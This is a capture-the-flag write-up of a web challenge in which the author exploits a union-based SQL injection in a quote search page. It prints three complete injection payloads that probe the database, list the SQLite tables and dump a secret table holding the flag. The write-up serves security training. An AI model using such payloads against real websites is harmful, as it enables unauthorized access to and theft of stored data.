Challenge
Did you check my website? It offers a way to search for inspirational quotes, I hope there's nothing wrong with it, but on the off chance that you might find anything, please be kind and let me know what you found :)
http://wisdom.ctf.unitedctf.ca/
Solution
The website had 2 pages:
- a page that allows you to search through a list of inspirational quotes
- a page that takes a link for the admin to visit it
After testing the search functionality for a bit, I found a union based SQL injection:
' AND FALSE UNION SELECT 'test', 'test2' FROM quotes; -- -
When manually exploiting SQLi, the first thing to do is to find out which type of database is running because all databases have a slightly different syntax and table names.
With that said, all databases still have some sort of INFORMATION_SCHEMA database which stores the names of all other tables.
After testing for different tables names, I eventually found one named sqlite_master which obviously meant that this was a SQLite database.
Listing the table names was as simple as:
' AND FALSE UNION SELECT 'a', tbl_name FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'; -- -
Finally, the flag was stored in the secret table:
' AND FALSE UNION SELECT 'a', * FROM my_s3cr3t_7abl3; -- -